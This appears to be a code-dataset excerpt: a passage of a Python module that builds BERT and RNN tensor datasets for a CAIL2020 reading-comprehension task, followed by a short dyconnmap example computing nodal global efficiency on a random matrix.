doc_input_ids=doc_input_ids,
doc_input_mask=doc_input_mask,
doc_segment_ids=doc_segment_ids,
query_tokens=query_tokens,
query_input_ids=query_input_ids,
query_input_mask=query_input_mask,
query_segment_ids=query_segment_ids,
sent_spans=sentence_spans,
sup_fact_ids=sup_fact_ids,
ans_type=ans_type,
token_to_orig_map=tok_to_orig_index,
start_position=ans_start_position,
end_position=ans_end_position)
)
return features
def _convert_sentence_pair_to_bert_dataset(
self, features_list):
"""Convert sentence pairs to dataset for BERT model.
Args:
sc_list, bc_list: List[List[str]], list of word tokens list
label_list: train: List[int], list of labels
test: []
Returns:
Train:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids, label)
Test:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids)
"""
IGNORE_INDEX = -100
max_seq_len = 512
sent_limit = max_support_sents
max_query_len = 50
doc_input_ids, doc_input_mask, doc_segment_ids, query_mapping = [],[],[],[]
start_mapping, all_mapping, is_support = [], [], []
y1, y2, ids, q_type = [], [], [], []
tok_to_orig_index = []
for i, features in tqdm(enumerate(features_list), ncols=80):
doc_input_ids.append(features.doc_input_ids)
doc_input_mask.append(features.doc_input_mask)
doc_segment_ids.append(features.doc_segment_ids)
query_mapping_ = torch.Tensor(max_seq_len)
if len(features.token_to_orig_map) <= 512:
features.token_to_orig_map = features.token_to_orig_map + [0]*(512-len(features.token_to_orig_map))
features.token_to_orig_map = features.token_to_orig_map[:512]
tok_to_orig_index.append(features.token_to_orig_map)
start_mapping_ = torch.Tensor(sent_limit, max_seq_len)
all_mapping_ = torch.Tensor(max_seq_len, sent_limit)
is_support_ = [0] * sent_limit
for mapping in [start_mapping_, all_mapping_, query_mapping_]:
mapping.zero_() # 把几个mapping都初始化为0
for j in range(features.sent_spans[0][0] - 1):
query_mapping_[j] = 1
query_mapping.append(query_mapping_.unsqueeze(dim=0))
if features.ans_type == 0:
if len(features.end_position) == 0:
y1.append(0)
y2.append(0) # 如果结束位置是0,span的标签就为0
elif features.end_position[0] < max_seq_len:
y1.append(features.start_position[0]) # 只用第一个找到的span
y2.append(features.end_position[0])
else:
y1.append(0)
y2.append(0)
else:
y1.append(IGNORE_INDEX) # span是-100
y2.append(IGNORE_INDEX)
q_type.append(features.ans_type) # 这个明明是answer_type,非要叫q_type
ids.append(features.qas_id)
for j, sent_span in enumerate(features.sent_spans[:sent_limit]): # 句子序号,span
is_sp_flag = j in features.sup_fact_ids # 这个代码写的真几把烂#我也觉得
start, end = sent_span
# if start < end: # 还有start大于end的时候?
is_support_[j] = int(is_sp_flag) # 样本i的第j个句子是否是sp
all_mapping_[start:end + 1, j] = 1 # (batch_size, max_seq_len, 20) 第j个句子开始和结束全为1
start_mapping_[j, start] = 1 # (batch_size, 20, max_seq_len)
is_support.append(is_support_)
start_mapping.append(start_mapping_.unsqueeze(dim=0))
all_mapping.append(all_mapping_.unsqueeze(dim=0))
context_idxs = torch.tensor(doc_input_ids, dtype=torch.long)
context_mask = torch.tensor(doc_input_mask, dtype=torch.long)
segment_idxs = torch.tensor(doc_segment_ids, dtype=torch.long)
tok_to_orig_index = torch.tensor(tok_to_orig_index, dtype=torch.long)
query_mapping = torch.cat(query_mapping, dim=0)
start_mapping = torch.cat(start_mapping, dim=0)
all_mapping = torch.cat(all_mapping, dim=0)
ids = torch.tensor(ids, dtype=torch.long)
y1 = torch.tensor(y1, dtype=torch.long)
y2 = torch.tensor(y2, dtype=torch.long)
q_type = torch.tensor(q_type, dtype=torch.long)
is_support = torch.tensor(is_support, dtype=torch.long)
return TensorDataset(
context_idxs, context_mask, segment_idxs,
query_mapping, all_mapping,
ids, y1, y2, q_type,
start_mapping,
is_support,tok_to_orig_index
)
def _convert_sentence_pair_to_rnn_dataset(
self, s1_list, s2_list, label_list=None):
"""Convert sentences pairs to dataset for RNN model.
Args:
sc_list, bc_list: List[List[str]], list of word tokens list
label_list: train: List[int], list of labels
test: []
Returns:
Train:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length, label)
Test:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length, label)
"""
all_s1_ids, all_s2_ids = [], []
all_s1_lengths, all_s2_lengths = [], []
for i in tqdm(range(len(s1_list)), ncols=80):
tokens_s1, tokens_s2 = s1_list[i], s2_list[i]
all_s1_lengths.append(min(len(tokens_s1), self.max_seq_len))
all_s2_lengths.append(min(len(tokens_s2), self.max_seq_len))
if len(tokens_s1) > self.max_seq_len:
tokens_s1 = tokens_s1[:self.max_seq_len]
if len(tokens_s2) > self.max_seq_len:
tokens_s2 = tokens_s2[:self.max_seq_len]
s1_ids = self.tokenizer.convert_tokens_to_ids(tokens_s1)
s2_ids = self.tokenizer.convert_tokens_to_ids(tokens_s2)
if len(s1_ids) < self.max_seq_len:
s1_ids += [0] * (self.max_seq_len - len(s1_ids))
if len(s2_ids) < self.max_seq_len:
s2_ids += [0] * (self.max_seq_len - len(s2_ids))
all_s1_ids.append(s1_ids)
all_s2_ids.append(s2_ids)
all_s1_ids = torch.tensor(all_s1_ids, dtype=torch.long)
all_s2_ids = torch.tensor(all_s2_ids, dtype=torch.long)
all_s1_lengths = torch.tensor(all_s1_lengths, dtype=torch.long)
all_s2_lengths = torch.tensor(all_s2_lengths, dtype=torch.long)
if label_list: # train
all_label_ids = torch.tensor(label_list, dtype=torch.long)
return TensorDataset(
all_s1_ids, all_s2_ids, all_s1_lengths, all_s2_lengths,
all_label_ids)
# test
return TensorDataset(
all_s1_ids, all_s2_ids, all_s1_lengths, all_s2_lengths)
def test_data():
"""Test for data module."""
# For BERT model
data = Data('model/bert/vocab.txt', model_type='bert')
_, _, _ = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv',
'SMP-CAIL2020-test1.csv')
# For RNN model
data = Data('model/rnn/vocab.txt', model_type='rnn')
_, _, _ = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv',
'SMP-CAIL2020-test1.csv')
if __name__ == '__main__':
test_data()
| [
"[email protected]"
] | |
f13ae364d5454fff0b466fd17c8c4e70af0a9e2e | e836275adf8adca9b77acdd3d25bac157592a995 | /examples/graphs_nodal.py | fa9e8e4ec004f0a57bfd774033e20c44044346d4 | [
"BSD-3-Clause"
] | permissive | makism/dyconnmap | 3de6f482d1370bf25ec3813ddf576b675ed99d9e | cbef247e635d55cb1489ba1e429d9d472b501b56 | refs/heads/master | 2023-08-03T19:30:40.779333 | 2022-03-14T18:24:16 | 2022-03-14T18:24:16 | 98,643,787 | 67 | 25 | BSD-3-Clause | 2023-07-24T04:49:03 | 2017-07-28T11:37:17 | Python | UTF-8 | Python | false | false | 360 | py | # -*- coding: utf-8 -*-
from dyconnmap.graphs import nodal_global_efficiency
import numpy as np
if __name__ == '__main__':
rng = np.random.RandomState(0)
mtx = rng.rand(64, 64)
mtx_symm = (mtx + mtx.T)/2
np.fill_diagonal(mtx_symm, 1.0)
inv_fcg = 1.0 / mtx_symm
nodal_ge = nodal_global_efficiency(1.0 / mtx_symm)
print(nodal_ge)
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.